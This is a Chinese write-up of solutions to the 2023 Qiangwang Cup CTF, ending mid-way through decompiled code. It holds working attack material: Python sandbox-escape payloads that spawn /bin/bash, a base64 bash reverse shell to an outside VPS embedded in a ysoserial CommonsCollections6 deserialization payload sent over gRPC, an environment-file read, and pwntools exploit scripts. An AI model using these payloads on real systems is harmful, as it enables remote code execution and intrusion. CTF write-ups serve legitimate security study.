网站开发的步骤,医院网站建设细节,河北邯郸做移动网站,wordpress 展示类主题第七届“强网杯”全国安全挑战赛 2023.12.16~2023.12.17 文章目录 【Misc】Pyjail ! Its myFILTER !!!easyfuzz谍影重重2.0签到Pyjail ! Its myRevenge !!!server_8F6C72124774022B.py 问卷调查 【Reverse】ezre 【Web】happygame 【强网先锋】石头剪刀布TrieSpeedUpezreez_fmt… 第七届“强网杯”全国安全挑战赛 2023.12.16~2023.12.17 文章目录 【Misc】Pyjail ! Its myFILTER !!!easyfuzz谍影重重2.0签到Pyjail ! Its myRevenge !!!server_8F6C72124774022B.py 问卷调查 【Reverse】ezre 【Web】happygame 【强网先锋】石头剪刀布TrieSpeedUpezreez_fmtBabyre 【Misc】
Pyjail ! It’s myFILTER !!!
nc连接后我们先来看看
┌──(root㉿penetration)-[/]
└─# nc 8.147.129.5 40072_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _| __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | || |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | || ___/ | | || |/ _ | | | | | | | | __| / __| | _ _ \| | | | __| | | | | | | | __| | _ / | | || | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_||_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)__/ |/ | __/ ||___/__/ |___/Python Version:python3.10
Source Code:import code, os, subprocess
import pty
def blacklist_fun_callback(*args):print(Player! Its already banned!)pty.spawn blacklist_fun_callback
os.system blacklist_fun_callback
os.popen blacklist_fun_callback
subprocess.Popen blacklist_fun_callback
subprocess.call blacklist_fun_callback
code.interact blacklist_fun_callback
code.compile_command blacklist_fun_callbackvars blacklist_fun_callback
attr blacklist_fun_callback
dir blacklist_fun_callback
getattr blacklist_fun_callback
exec blacklist_fun_callback
__import__ blacklist_fun_callback
compile blacklist_fun_callback
breakpoint blacklist_fun_callbackdel os, subprocess, code, pty, blacklist_fun_callback
input_code input(Can u input your code to escape )blacklist_words [subprocess,os,code,interact,pty,pdb,platform,importlib,timeit,imp,commands,popen,load_module,spawn,system,/bin/sh,/bin/bash,flag,eval,exec,compile,input,vars,attr,dir,getattr__import__,__builtins__,__getattribute__,__class__,__base__,__subclasses__,__getitem__,__self__,__globals__,__init__,__name__,__dict__,._module,builtins,breakpoint,import,
]def my_filter(input_code):for x in blacklist_words:if x in input_code:return Falsereturn Truewhile { in input_code and } in input_code and input_code.isascii() and my_filter(input_code) and eval not in input_code and len(input_code) 65:input_code eval(ff{input_code})
else:print(Player! Please obey the filter rules which I set!)Can u input your code to escape 分析一下
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):print(Player! Its already banned!)pty.spawn blacklist_fun_callback
os.system blacklist_fun_callback
os.popen blacklist_fun_callback
subprocess.Popen blacklist_fun_callback
subprocess.call blacklist_fun_callback
code.interact blacklist_fun_callback
code.compile_command blacklist_fun_callbackvars blacklist_fun_callback
attr blacklist_fun_callback
dir blacklist_fun_callback
getattr blacklist_fun_callback
exec blacklist_fun_callback
__import__ blacklist_fun_callback
compile blacklist_fun_callback
breakpoint blacklist_fun_callbackdel os, subprocess, code, pty, blacklist_fun_callback
input_code input(Can u input your code to escape )blacklist_words [subprocess,os,code,interact,pty,pdb,platform,importlib,timeit,imp,commands,popen,load_module,spawn,system,/bin/sh,/bin/bash,flag,eval,exec,compile,input,vars,attr,dir,getattr__import__,__builtins__,__getattribute__,__class__,__base__,__subclasses__,__getitem__,__self__,__globals__,__init__,__name__,__dict__,._module,builtins,breakpoint,import,
]def my_filter(input_code):for x in blacklist_words:if x in input_code:return Falsereturn Truewhile { in input_code and } in input_code and input_code.isascii() and my_filter(input_code) and eval not in input_code and len(input_code) 65:input_code eval(ff{input_code})
else:print(Player! Please obey the filter rules which I set!) 主要目的是创建一个安全的环境让用户在其中执行他们的代码同时防止他们执行可能会破坏系统或获取敏感信息的代码。 首先导入了一些Python模块如code, os, subprocess和pty然后定义了一个名为blacklist_fun_callback的函数该函数只是打印一条消息表示某个功能已被禁用。 然后将一些可能被恶意利用的函数和方法如os.system, os.popen, subprocess.Popen, subprocess.call等替换为blacklist_fun_callback如果用户试图使用这些函数他们只会看到一条消息而不会实际执行任何操作。 接下来删除了所有引用的模块和blacklist_fun_callback函数以防止用户直接访问它们。 然后提示用户输入他们想要执行的代码并将其存储在input_code变量中。 然后定义了一个名为blacklist_words的列表其中包含一些可能被恶意利用的关键字。 my_filter函数接受用户输入的代码并检查它是否包含blacklist_words列表中的任何关键字。如果包含函数返回False否则返回True。 在一个while循环中执行用户的代码只要它满足一些条件如不包含{或}是ASCII字符不包含blacklist_words列表中的任何关键字长度小于65等。如果用户的代码不满足这些条件代码将打印一条消息提示用户遵守过滤规则。
然后尝试了好多方法后来想着能不能直接读取环境变量因为我自己出题的时候就经常忘记把环境变量flagnot flag。最后payload
{print(open(/proc/1/environ).read())}easyfuzz
┌──(root㉿penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 一开始我也没明白什么意思然后随便输了点东西
┌──(root㉿penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 大致明白了是要跟000000000相同的位数
┌──(root㉿penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 222222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): df2222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 111111111
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 发现规律是前面两个可以是任意的字母或数字后面就要一个个去试了
xxqwbGoodqwb{YouKnowHowToFuzz!}
谍影重重2.0
提供了一个attach.pcapng文件根据题目内容以及通过观察数据包的话是ADS-B数据解析。
为了方便处理我们把它转换成JSON格式 在ADS-B (Automatic Dependent Surveillance-Broadcast) 系统中飞机广播的信息被编码为多种不同的消息类型每种类型的消息都有一个特定的类型码Type Code。这些类型码用于区分消息中包含的数据类型例如飞机的身份、位置、速度等。
根据ADS-B协议的规范来的。具体来说
类型码19通常用于表示地面速度信息。类型码20到22用于表示空中速度信息。
这些类型码定义了消息中包含的数据字段以及如何解析这些字段以获取飞机的速度和航向等信息。
这些信息通常可以在ADS-B协议的官方文档或相关的航空通信标准文档中找到。例如ICAO国际民用航空组织的文档就详细描述了ADS-B消息的格式和内容包括不同类型码的含义。
在处理ADS-B数据时解析器会根据这些类型码来解析消息内容并提取出相应的飞机速度信息。因此通过检查类型码来确定哪些消息包含了速度信息并据此提取和分析数据。
import json
import pyModeS as pms
import hashlib# 打开并读取json文件
with open(attach.json, r, encodingutf-8) as file:data json.load(file)# 初始化一个空列表来存储信息
info []# 遍历json数据中的每个数据包
for packet in data:# 检查数据包是否包含tcp层if layers in packet[_source] and tcp in packet[_source][layers]:tcp_layer packet[_source][layers][tcp]# 检查tcp层是否包含有效载荷if tcp.payload in tcp_layer:# 如果有将其添加到info列表中tcp_payload tcp_layer[tcp.payload].replace(:,)info.append(tcp_payload)# 初始化一个空列表来存储飞机数据
planes_data []# 遍历info列表中的每个元素
for i in info:# 提取出有效载荷中的消息部分msg i[18:]# 检查消息的类型码是否在19到22之间这些类型码对应的是飞机的速度信息if pms.adsb.typecode(msg) 19 and pms.adsb.typecode(msg) 22:# 如果是提取出飞机的ICAO代码和速度信息icao pms.adsb.icao(msg)velocity_info pms.adsb.velocity(msg)speed, track, vertical_rate, _ velocity_info# 将这些信息存储在一个字典中并将该字典添加到planes_data列表中plane_info {icao: icao, speed: speed, track: track, vertical_rate: vertical_rate}planes_data.append(plane_info)# 找出速度最快的飞机
fastest_plane max(planes_data, keylambda x: x[speed])# 打印出该飞机的ICAO代码的MD5哈希值
print(flag{hashlib.md5(fastest_plane[icao].upper().encode()).hexdigest()})签到 flag{welcome_to_qwb_2023}
Pyjail ! It’s myRevenge !!!
┌──(root㉿penetration)-[/]
└─# nc 8.147.133.154 29942_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _| __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | || |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | || ___/ | | || |/ _ | | | | | | | | __| / __| | _ _ \| | | | __| | | | | | | | __| | _ / | | || | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_||_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)__/ |/ | __/ ||___/__/ |___/Python Version:python3.10
Source Code:import code, os, subprocess
import pty
def blacklist_fun_callback(*args):print(Player! Its already banned!)pty.spawn blacklist_fun_callback
os.system blacklist_fun_callback
os.popen blacklist_fun_callback
subprocess.Popen blacklist_fun_callback
subprocess.call blacklist_fun_callback
code.interact blacklist_fun_callback
code.compile_command blacklist_fun_callbackvars blacklist_fun_callback
attr blacklist_fun_callback
dir blacklist_fun_callback
getattr blacklist_fun_callback
exec blacklist_fun_callback
__import__ blacklist_fun_callback
compile blacklist_fun_callback
breakpoint blacklist_fun_callbackdel os, subprocess, code, pty, blacklist_fun_callback
input_code input(Can u input your code to escape )blacklist_words_var_name_fake_in_local_real_in_remote [subprocess,os,code,interact,pty,pdb,platform,importlib,timeit,imp,commands,popen,load_module,spawn,system,/bin/sh,/bin/bash,flag,eval,exec,compile,input,vars,attr,dir,getattr__import__,__builtins__,__getattribute__,__class__,__base__,__subclasses__,__getitem__,__self__,__globals__,__init__,__name__,__dict__,._module,builtins,breakpoint,import,
]def my_filter(input_code):for x in blacklist_words_var_name_fake_in_local_real_in_remote:if x in input_code:return Falsereturn Truewhile { in input_code and } in input_code and input_code.isascii() and my_filter(input_code) and eval not in input_code and len(input_code) 65:input_code eval(ff{input_code})
else:print(Player! Please obey the filter rules which I set!)Can u input your code to escape 先来分析一下
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):print(Player! Its already banned!)pty.spawn blacklist_fun_callback
os.system blacklist_fun_callback
os.popen blacklist_fun_callback
subprocess.Popen blacklist_fun_callback
subprocess.call blacklist_fun_callback
code.interact blacklist_fun_callback
code.compile_command blacklist_fun_callbackvars blacklist_fun_callback
attr blacklist_fun_callback
dir blacklist_fun_callback
getattr blacklist_fun_callback
exec blacklist_fun_callback
__import__ blacklist_fun_callback
compile blacklist_fun_callback
breakpoint blacklist_fun_callbackdel os, subprocess, code, pty, blacklist_fun_callback
input_code input(Can u input your code to escape )blacklist_words_var_name_fake_in_local_real_in_remote [subprocess,os,code,interact,pty,pdb,platform,importlib,timeit,imp,commands,popen,load_module,spawn,system,/bin/sh,/bin/bash,flag,eval,exec,compile,input,vars,attr,dir,getattr__import__,__builtins__,__getattribute__,__class__,__base__,__subclasses__,__getitem__,__self__,__globals__,__init__,__name__,__dict__,._module,builtins,breakpoint,import,
]def my_filter(input_code):for x in blacklist_words_var_name_fake_in_local_real_in_remote:if x in input_code:return Falsereturn Truewhile { in input_code and } in input_code and input_code.isascii() and my_filter(input_code) and eval not in input_code and len(input_code) 65:input_code eval(ff{input_code})
else:print(Player! Please obey the filter rules which I set!) 大致可以是一个安全性过滤器它的主要目的是防止用户执行一些可能会对系统造成危害的操作。这是通过在代码中禁止一些可能会被恶意利用的函数和模块来实现的。 首先定义了一个名为blacklist_fun_callback的函数它会在被调用时打印一条消息。然后将一些可能被恶意利用的函数和模块如os.system、subprocess.Popen等都替换为这个函数。这样如果用户试图使用这些函数或模块就会失败而只会看到定义的消息。 接下来定义了一个名为blacklist_words_var_name_fake_in_local_real_in_remote的列表其中包含了一些可能会被恶意利用的关键词。这些关键词包括一些可能会被用来执行恶意代码的函数名、模块名和路径等。 然后定义了一个名为my_filter的函数它会检查用户输入的代码中是否包含这些关键词。如果包含函数将返回False否则返回True。 最后使用一个while循环来接收并处理用户的输入。只有当用户的输入满足所有的条件不包含大括号只包含ASCII字符不包含黑名单中的关键词长度小于65且不包含eval时输入的代码才会被执行。否则将打印一条消息提示用户遵守过滤规则。
目标很明确就是绕过代码中的安全过滤器利用Python的动态特性和字符串格式化来绕过过滤器的限制以执行任意代码并最终获取shell访问。
首先可以清空blacklist_words_var_name_fake_in_local_real_in_remote列表my_filter函数就不会再过滤任何输入。假设黑名单被清空那么此时就可以使用eval函数为了保险起见要通过拼接字符串来获取eval函数绕过直接使用eval关键词的限制。然后通过__import__函数导入os模块绕过直接使用os关键词的限制使用os.execv函数执行/bin/bash打开一个新的bash shell。最后payload
{list(locals().values())[-2].clear()}\{input()}\
{__builtins__.__dict__[eval](input())}
{__builtins__.__dict__[__import__](os).execv(/bin/bash,[/bin/bash])}server_8F6C72124774022B.py
import code, os, subprocess
import ptyWELCOME _____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _ | __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | || |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | || ___/ | | || |/ _ | | | | | | | | __| / __| | _ _ \| | | | __| | | | | | | | __| | _ / | | || | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_||_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)__/ |/ | __/ | |___/__/ |___/
SOURCE_CODE
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):print(Player! Its already banned!)pty.spawn blacklist_fun_callback
os.system blacklist_fun_callback
os.popen blacklist_fun_callback
subprocess.Popen blacklist_fun_callback
subprocess.call blacklist_fun_callback
code.interact blacklist_fun_callback
code.compile_command blacklist_fun_callbackvars blacklist_fun_callback
attr blacklist_fun_callback
dir blacklist_fun_callback
getattr blacklist_fun_callback
exec blacklist_fun_callback
__import__ blacklist_fun_callback
compile blacklist_fun_callback
breakpoint blacklist_fun_callbackdel os, subprocess, code, pty, blacklist_fun_callback
input_code input(Can u input your code to escape )blacklist_words_var_name_fake_in_local_real_in_remote [subprocess,os,code,interact,pty,pdb,platform,importlib,timeit,imp, commands,popen,load_module,spawn,system,/bin/sh,/bin/bash,flag,eval,exec,compile,input,vars,attr,dir,getattr__import__,__builtins__,__getattribute__,__class__,__base__,__subclasses__,__getitem__,__self__,__globals__,__init__,__name__,__dict__,._module,builtins,breakpoint,import,
]def my_filter(input_code):for x in blacklist_words_var_name_fake_in_local_real_in_remote:if x in input_code:return Falsereturn Truewhile { in input_code and } in input_code and input_code.isascii() and my_filter(input_code) and eval not in input_code and len(input_code) 65:input_code eval(ff{input_code})
else:print(Player! Please obey the filter rules which I set!)
def blacklist_fun_callback(*args):print(Player! Its already banned!)pty.spawn blacklist_fun_callback
os.system blacklist_fun_callback
os.popen blacklist_fun_callback
subprocess.Popen blacklist_fun_callback
subprocess.call blacklist_fun_callback
code.interact blacklist_fun_callback
code.compile_command blacklist_fun_callbackvars blacklist_fun_callback
attr blacklist_fun_callback
dir blacklist_fun_callback
getattr blacklist_fun_callback
exec blacklist_fun_callback
__import__ blacklist_fun_callback
compile blacklist_fun_callback
breakpoint blacklist_fun_callbackdel os, subprocess, code, pty, blacklist_fun_callbackprint(WELCOME)
print(Python Version:python3.10)
print(Source Code:)
print(SOURCE_CODE)
input_code input(Can u input your code to escape )b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120 [subprocess,os,code,interact,pty,pdb,platform,importlib,timeit,imp, commands,popen,load_module,spawn,system,/bin/sh,/bin/bash,flag,eval,exec,compile,input,vars,attr,dir,getattr__import__,__builtins__,__getattribute__,__class__,__base__,__subclasses__,__getitem__,__self__,__globals__,__init__,__name__,__dict__,._module,builtins,breakpoint,import,
]def my_filter(input_code):for x in b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120:if x in input_code:return Falsereturn Truewhile { in input_code and } in input_code and input_code.isascii() and my_filter(input_code) and eval not in input_code and len(input_code) 65:input_code eval(ff{input_code})
else:print(Player! Please bypass my filter !)
问卷调查 flag{see_you_again_qwb_s8}
【Reverse】
ezre
一开始想随便看看的但是后来发现了什么 这不就是SM4加密
密钥
01 23 45 67 89 AB CD EF 01 23 45 67 89 AB CD EF 密文
06 75 19 47 16 63 88 7C
8B 66 55 FF 3F 7D 0D 4A
F5 D2 4E 38 3F E9 C2 DE
DB 7C 7F 6F 74 B1 1F 3C 解密 66 6c 61 67 7b 68 33 6b 6b 30 5f 77 30 72 6c 64 5f 73 75 72 33 5f 33 6e 30 75 67 68 7d 00 00 00 看到关键的666c就是fl的前缀了十六进制转字符串 flag{h3kk0_w0rld_sur3_3n0ugh}
【Web】
happygame
这里要用到这个工具https://github.com/Y4er/ysoserialhttps://jitpack.io/com/github/Y4er/ysoserial/main-SNAPSHOT/ysoserial-main-SNAPSHOT.jar还有grpcui.exe。然后顺带准备一台VPS139.159.215.68。
/bin/bash -i /dev/tcp/139.159.215.68/6767 01
base64编码
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ 然后
CommonsCollections6 bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ}|{base64,-d}|{bash,-i} | base64 | tr -d \n┌──(root㉿penetration)-[/]
└─# java -jar ysoserial-main-cff1edf282-1.jar CommonsCollections6 bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ}|{base64,-d}|{bash,-i} | base64 | tr -d \n
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQBAAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQBABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQBABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA Terminal执行
grpcui.exe -plaintext 8.147.129.191:26804 选择Raw RequestRequest payload
{serializeData: rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQBAAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQBABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQBABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA} VPS上进行监听
rootecs-74b2:~# nc -lvnp 6767
Listening on 0.0.0.0 6767
然后点击Invoke 回到服务器上就可以正常反弹shell了 【强网先锋】
石头剪刀布
从sklearn.naive_bayes中的MultinomialNB中看出是朴素贝叶斯分类器用于训练模型。
from pwn import *premote(8.147.131.39, 28434)def Z():p.recv()p.sendline(b0)
def O():p.recv()p.sendline(b1)
def T():p.recv()p.sendline(b2)while True:Z()Z()Z()Z()Z()O()O()T()T()Z()O()T()Z()T()Z()T()O()Z()T()O()O()Z()Z()O()O()O()T()T()T()Z()Z()O()T()Z()Z()T()T()O()O()Z()O()T()Z()O()Z()O()Z()T()O()T()T()Z()T()O()Z()Z()T()T()O()O()Z()O()Z()O()T()Z()T()Z()T()O()Z()T()O()Z()Z()O()O()O()T()T()O()Z()O()T()T()Z()O()T()Z()O()T()# 接收服务器的响应bp.recv()# 将响应的字节字符串解码为utf-8格式的字符串decoded_string4 b.decode(utf-8)print(decoded_string4)# 向服务器发送请求p.sendline(b2)ap.recv()decoded_string a.decode(utf-8)print(decoded_string)
Trie
题目让我想到Trie树。逆向观察后的大致思路就是利用Trie树的特性通过发送特定的IP地址来触发服务器端的某种漏洞然后从服务器的响应中提取出敏感信息。
根据思路调整最后exp
from pwn import *# context.log_level debug
context.terminal [/bin/tmux, sp, -h]
context(archamd64, oslinux)flag def add(sh, data):sh.sendlineafter(4. Quit., 1)sh.sendlineafter(destination IP:, data)sh.sendlineafter(next hop:, data)def show(sh, data):sh.sendlineafter(4. Quit., 2)sh.sendlineafter(destination IP:, data)sh.recvuntil(The next hop is )flag_part sh.recvuntil(\n, dropTrue).decode(utf-8)flag_part flag_part.split(.)[::-1]return tostring(flag_part)def get_flag(sh):sh.sendlineafter(4. Quit., 3)def tostring(t_flag):return .join(chr(int(i, 10)) for i in t_flag)def padding():sh remote(47.104.150.173, 1337)add(sh, 1.2.3.4)add(sh, 2.3.4.5)return shdef retrieve_flag(ip):global flagsh padding()add(sh, ip)get_flag(sh)flag show(sh, ip)print(flag)def main():ips [129.2.3.4,193.2.3.4,225.2.3.4,241.2.3.4,249.2.3.4,253.2.3.4,255.2.3.4,254.2.3.4,254.130.3.4,254.194.3.4]for ip in ips:retrieve_flag(ip)if __name__ __main__:main()SpeedUp
我们先看一下题目 x ( 2 27 ) ! x(2^{27})! x(227)!
def f(x):res 0while x:res x % 10x // 10return res 意思是求2的27次方的阶乘所获得的每一位数字之和。
当时想的是直接手搓但又不大可能后来在网上找了好久发现在OEIS直接记录了https://oeis.org/A244060 然后看他的list import hashlib
n4495662081
n_str str(n)# 创建一个sha256哈希对象
sha256_hash hashlib.sha256()
# 提供要哈希的数据
sha256_hash.update(n_str.encode(utf-8))
# 获取哈希值
hash_value sha256_hash.hexdigest()
print(flag{hash_value})flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}
ezre
一眼看到main函数
__int64 __fastcall main(int a1, char **a2, char **a3)
{int v3; // eaxunsigned int v4; // eaxint v5; // eaxsize_t v6; // raxint v7; // edxunsigned int v8; // eaxint v9; // eaxint v10; // eaxint v11; // eaxsize_t v12; // raxint v13; // ecxint v14; // eaxint v16; // [rsp128h] [rbp-118h]int v17; // [rsp12Ch] [rbp-114h]int v18; // [rsp130h] [rbp-110h]int v19; // [rsp134h] [rbp-10Ch]int v20; // [rsp138h] [rbp-108h]int v21; // [rsp13Ch] [rbp-104h]char v22[64]; // [rsp140h] [rbp-100h] BYREFchar v23[64]; // [rsp180h] [rbp-C0h] BYREFchar v24[64]; // [rsp1C0h] [rbp-80h] BYREFchar s[52]; // [rsp200h] [rbp-40h] BYREFunsigned int v26; // [rsp234h] [rbp-Ch]size_t v27; // [rsp238h] [rbp-8h]v26 0;printf(Welcome to the CTF world:);memset(s, 0, 0x32uLL);__isoc99_scanf(%s, s);v27 strlen(s);v16 1111065332;while ( 1 ){while ( 1 ){while ( 1 ){while ( 1 ){while ( 1 ){while ( 1 ){while ( 1 ){while ( v16 -1884415306 )v16 874394363;if ( v16 ! -1610796817 )break;v5 951531691;if ( v21 4 )v5 -123677562;v16 v5;}if ( v16 ! -1571665377 )break;v8 strlen(v22);sub_401980(v22, v23, 